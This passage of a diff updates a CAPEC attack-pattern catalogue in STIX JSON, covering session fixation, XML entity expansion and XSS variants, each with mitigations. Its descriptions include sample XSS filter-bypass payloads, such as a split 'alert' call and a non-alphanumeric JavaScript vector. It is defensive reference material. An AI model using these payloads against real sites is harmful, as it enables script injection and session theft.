"course-of-action--7052d162-d901-485b-9a23-2eee96a9717f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--2b82d713-3fda-42e7-9af8-d57bc260cdbc", - "source_ref": "course-of-action--ee734f89-5dc1-409b-88ec-4a213f05c039", + "id": "relationship--a443ace7-3d84-46bd-8fb0-ce9c208edef9", + "source_ref": "course-of-action--7052d162-d901-485b-9a23-2eee96a9717f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--388e51bb-c597-4ac3-a38c-e1d1fd09a24f" + "target_ref": "attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9" }, { "name": "Exploit Script-Based APIs", "description": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support \n A similar example uses session ID as an argument of the URL.\n http://www.example.com/index.php/sessionid=0123456789\n Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c955ec7a-7245-4896-96db-63aa238c79a8" + "id": "attack-pattern--a2a587c0-5e5a-4d29-bae0-5ef9ac289a1e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-196-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", "type": "course-of-action", - "id": "course-of-action--0c153d3d-0a5a-4090-b764-48017973f4c2" + "id": "course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e624f31c-8266-4ab4-88bc-f92ac25bbece", - "source_ref": "course-of-action--0c153d3d-0a5a-4090-b764-48017973f4c2", + "id": "relationship--06e577c6-924c-4c7c-9bc1-0ebd78f9a78d", + "source_ref": "course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c955ec7a-7245-4896-96db-63aa238c79a8" + "target_ref": "attack-pattern--a2a587c0-5e5a-4d29-bae0-5ef9ac289a1e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-196-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", "type": "course-of-action", - "id": "course-of-action--388ed0d9-4d82-4c70-a711-6ae21df83528" + "id": "course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--cb86c650-e487-4504-9bf0-069619a1cc1b", - "source_ref": "course-of-action--388ed0d9-4d82-4c70-a711-6ae21df83528", + "id": "relationship--6a6db02d-7342-4850-a0b7-7d00d6f23ace", + "source_ref": "course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c955ec7a-7245-4896-96db-63aa238c79a8" + "target_ref": "attack-pattern--a2a587c0-5e5a-4d29-bae0-5ef9ac289a1e" }, { "name": "XML Entity Expansion", "description": "An attacker submits an XML document to a target application where the XML document uses nested entity expansion to produce an excessively large output XML. XML allows the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -10102,65 +10205,66 @@ "\n The most common example of this type of attack is the \"many laughs\" attack (sometimes called the 'billion laughs' attack). For example:\n \n ]>&lol9;\n This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9bc27655-523d-4873-bb8f-014dcba7b781" + "id": "attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-197-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.", "type": "course-of-action", - "id": "course-of-action--3cd2d3da-9e18-4239-a148-40d24c658112" + "id": "course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--088b79cd-bf82-41db-9092-997fc633957e", - "source_ref": "course-of-action--3cd2d3da-9e18-4239-a148-40d24c658112", + "id": "relationship--01beec7d-cef0-4ca3-b4cc-6572ba0db0eb", + "source_ref": "course-of-action--8927df5b-bfaa-4da1-af31-ce2704a8158d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9bc27655-523d-4873-bb8f-014dcba7b781" + "target_ref": "attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-197-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Disable altogether the use of inline DTD schemas in your XML parsing objects. If must use DTD, normalize, filter and white list and parse with methods and routines that will detect entity expansion from untrusted sources.", "type": "course-of-action", - "id": "course-of-action--b173ccaa-4372-4a7f-9d42-965283a7446b" + "id": "course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c11e0b29-2413-4aea-ab49-8b519f827191", - "source_ref": "course-of-action--b173ccaa-4372-4a7f-9d42-965283a7446b", + "id": "relationship--3da638be-62d3-463c-b831-d98972595ef7", + "source_ref": "course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9bc27655-523d-4873-bb8f-014dcba7b781" + "target_ref": "attack-pattern--4a3aea87-ebbb-4369-bc6b-c774c5899b18" }, { "name": "XSS Targeting Error Pages", "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page. When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the attacker the infected error message error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -10186,90 +10290,91 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c73ea0e8-5b41-432a-965c-87c04fb5f1dc" + "id": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-198-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use libraries and templates that minimize unfiltered input.", "type": "course-of-action", - "id": "course-of-action--482eb67a-26af-4fd2-9e71-59ff7bea286c" + "id": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--0b0af975-3c29-4526-80f5-bd9eac5b3c6d", - "source_ref": "course-of-action--482eb67a-26af-4fd2-9e71-59ff7bea286c", + "id": "relationship--069d7df7-8fac-44c4-8b79-12b6d675ed90", + "source_ref": "course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c73ea0e8-5b41-432a-965c-87c04fb5f1dc" + "target_ref": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-198-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Normalize, filter and white list any input that will be used in error messages.", "type": "course-of-action", - "id": "course-of-action--7b6c5f9f-a162-49d5-88c1-1560a2d3d2e6" + "id": "course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4b42ec4b-e407-4db4-9830-14cbaf5a3f73", - "source_ref": "course-of-action--7b6c5f9f-a162-49d5-88c1-1560a2d3d2e6", + "id": "relationship--8ffe3d92-6215-4893-93ed-a0b59d44c7ef", + "source_ref": "course-of-action--0294f3dd-2a98-44e1-a229-b6928f573805", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c73ea0e8-5b41-432a-965c-87c04fb5f1dc" + "target_ref": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-198-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: The victim should configure the browser to minimize active content from untrusted sources.", "type": "course-of-action", - "id": "course-of-action--474c8431-cbe9-414a-b533-15fa606e94d8" + "id": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b502e01b-3f2e-4dff-8912-acbd9bbad717", - "source_ref": "course-of-action--474c8431-cbe9-414a-b533-15fa606e94d8", + "id": "relationship--1f7f81e8-3b04-49a1-babd-2ef6e940666c", + "source_ref": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c73ea0e8-5b41-432a-965c-87c04fb5f1dc" + "target_ref": "attack-pattern--2cee1dd8-0815-4116-8e4a-14b43e9d8463" }, { "name": "XSS Using Alternate Syntax", "description": "An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the \"script\" tag using the alternate forms of \"Script\" or \"ScRiPt\" may bypass filters where \"script\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -10351,203 +10456,204 @@ "\n In this example, the attacker tries to get executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An attacker will then create a special payload to bypass this filter:\n alert(1)\n when the applications gets this input string, it will replace all \"script\" (case insensitive) by the empty string and the resulting input will be the desired vector by the attacker:\n \n In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., ). For the attacker to execute the same payload as in the previous example, he would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter\n ((\\w+)\\s*\\(.*\\)|alert|eval|function|document)\n and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string \"alert\" would be stripped. An attacker will then create a special payload to bypass this filter:\n this['al' + 'ert'](1)\n when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The attacker could also have used non-alphanumeric XSS vectors to bypass the filter; for example,\n ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)\n would be executed by the JavaScript engine like alert(1) is.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "id": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-199-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use browser technologies that do not allow client side scripting.", "type": "course-of-action", - "id": "course-of-action--d8c851f4-9464-4d22-b6a5-8e817e3754d1" + "id": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--9469756a-0a8e-4ec7-8da3-8bd84cf581c3", - "source_ref": "course-of-action--d8c851f4-9464-4d22-b6a5-8e817e3754d1", + "id": "relationship--a1b0fa62-f694-453e-9183-9e0e3bd73735", + "source_ref": "course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-199-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Utilize strict type, character, and encoding enforcement", "type": "course-of-action", - "id": "course-of-action--a837738e-a076-4304-b906-9664bc087b5e" + "id": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--12029449-25c3-4e6c-87f8-0a325231f08d", - "source_ref": "course-of-action--a837738e-a076-4304-b906-9664bc087b5e", + "id": "relationship--012c28c7-1587-4ee3-9a08-e8c88ad5b321", + "source_ref": "course-of-action--f574f5d2-f432-454c-b6f1-15e34c1c479d", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-199-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.", "type": "course-of-action", - "id": "course-of-action--f3bd3d55-f25e-4bff-b92b-5a1b421a1975" + "id": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--53399c01-c763-4f7e-a4f5-2685a253296f", - "source_ref": "course-of-action--f3bd3d55-f25e-4bff-b92b-5a1b421a1975", + "id": "relationship--1a7a10fe-b358-4927-9821-52ae29e5485c", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-199-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Ensure all content coming from the client is using the same encoding; if not, the server-side application must canonicalize the data before applying any filtering.", "type": "course-of-action", - "id": "course-of-action--172c29c6-d4d0-4ef5-8f07-482bd059ed0d" + "id": "course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5ed4a811-a4eb-4679-9f33-9d856fb3a573", - "source_ref": "course-of-action--172c29c6-d4d0-4ef5-8f07-482bd059ed0d", + "id": "relationship--978d5ab4-e6d1-42c0-9135-320cebd99221", + "source_ref": "course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--292006c5-fdfc-465e-aaf5-0eb896b92740", - "source_ref": "course-of-action--ae06444d-0bce-4627-9991-906eb216a098", + "id": "relationship--bc1c0d60-d9b5-4a17-84a5-e572772c76ea", + "source_ref": "course-of-action--c5259bad-3aa0-4826-acb3-eef0dae15daa", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-199-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Perform output validation for all remote content.", "type": "course-of-action", - "id": "course-of-action--c4397106-6835-4ce6-b6e4-80a636d6f5a8" + "id": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a16bcff4-c97a-4fe6-b5c1-38f41dcd52c5", - "source_ref": "course-of-action--c4397106-6835-4ce6-b6e4-80a636d6f5a8", + "id": "relationship--943fef2d-bf83-4cb0-b4cc-ac89d5c9b082", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-199-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Disable scripting languages such as JavaScript in browser", "type": "course-of-action", - "id": "course-of-action--4bdc152c-7111-4d9d-872a-6c9579ddb87c" + "id": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--967bc2f1-29ac-4ef1-875c-4f7a81fb1a06", - "source_ref": "course-of-action--4bdc152c-7111-4d9d-872a-6c9579ddb87c", + "id": "relationship--04166c81-46af-491c-bef7-9923dbc63070", + "source_ref": "course-of-action--a78dc251-20b0-40ba-8c69-a48e4dc81eb5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--c84f3333-4020-48e8-8fbe-9fadb4106b6a" + "target_ref": "attack-pattern--695e41ff-9743-4a1e-9836-5a9f14153459" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-199-7", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Patching software. There are many attack vectors for XSS on the client side and the server side. Many vulnerabilities are fixed in service packs for browser, web servers, and plug in technologies, staying current on patch release that deal with XSS countermeasures mitigates this.", "type": "course-of-action", - "id": "course-of-action--29cc8977-ef47-4c16-a4d2-92483b2e34ec" + "id": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - 